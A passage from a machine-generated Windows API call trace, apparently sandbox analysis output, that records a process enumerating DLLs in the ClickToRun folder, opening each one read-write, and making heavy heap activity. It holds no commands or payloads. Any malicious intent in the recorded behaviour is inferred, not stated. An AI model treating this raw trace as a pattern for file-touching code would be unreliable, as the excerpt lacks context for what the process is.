dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.070] GetFileType (hFile=0x42c) returned 0x1 [0074.070] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.070] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.070] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.070] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.070] CloseHandle (hObject=0x42c) returned 1 [0074.070] AreFileApisANSI () returned 1 [0074.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0074.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x80a30 [0074.071] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 90 [0074.071] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.071] GetFileType (hFile=0x42c) returned 0x1 [0074.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.071] CloseHandle (hObject=0x42c) returned 1 [0074.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.071] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0074.071] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dee0 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dee0 | out: hHeap=0x20000) returned 1 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0074.072] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0074.072] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0074.072] AreFileApisANSI () returned 1 [0074.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0074.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb4) returned 0x80a30 [0074.073] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71ca0, cbMultiByte=-1, lpWideCharStr=0x80a30, cchWideChar=90 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll") returned 90 [0074.073] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-file-l2-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x809e6bf5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x809e6bf5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x48c0)) returned 1 [0074.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0074.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0074.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.073] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.073] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x52c0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-core-localization-l1-2-0.dll", cAlternateFileName="API-MS~3.DLL")) returned 1 [0074.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0074.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0074.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0074.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46358 [0074.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0074.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d0b0 [0074.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d6e0 [0074.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d0b0 | out: hHeap=0x20000) returned 1 [0074.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0074.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x719c8 [0074.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0074.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d6e0 | out: hHeap=0x20000) returned 1 [0074.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.073] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0074.073] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0074.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0074.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0074.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e828 [0074.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0074.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd0) returned 0x74868 [0074.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e828 | out: hHeap=0x20000) returned 1 [0074.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0074.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd0) returned 0x73ff8 [0074.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x74868 | out: hHeap=0x20000) returned 1 [0074.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x11c) returned 0x56280 [0074.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x73ff8 | out: hHeap=0x20000) returned 1 [0074.074] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0074.074] AreFileApisANSI () returned 1 [0074.074] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll", lpUsedDefaultChar=0x0) returned 98 [0074.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0074.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.074] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0074.074] AreFileApisANSI () returned 1 [0074.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0074.074] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x5a6b8 [0074.074] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=98 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 98 [0074.075] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.075] GetFileType (hFile=0x42c) returned 0x1 [0074.075] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.075] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.075] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.075] SetFilePointerEx (in: hFile=0x42c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.075] CloseHandle (hObject=0x42c) returned 1 [0074.075] AreFileApisANSI () returned 1 [0074.075] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0074.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x5a6b8 [0074.076] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=98 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 98 [0074.076] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0074.076] GetFileType (hFile=0x42c) returned 0x1 [0074.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.076] CloseHandle (hObject=0x42c) returned 1 [0074.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0074.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.076] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0074.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0074.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0074.076] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e148 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e148 | out: hHeap=0x20000) returned 1 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd98 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cfa8 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cfa8 | out: hHeap=0x20000) returned 1 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd98 | out: hHeap=0x20000) returned 1 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0074.077] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0074.077] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0074.077] AreFileApisANSI () returned 1 [0074.077] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 98 [0074.078] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc4) returned 0x5a6b8 [0074.078] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x75dc8, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=98 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll") returned 98 [0074.078] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-core-localization-l1-2-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x52c0)) returned 1 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.078] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0074.078] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.078] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.078] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, 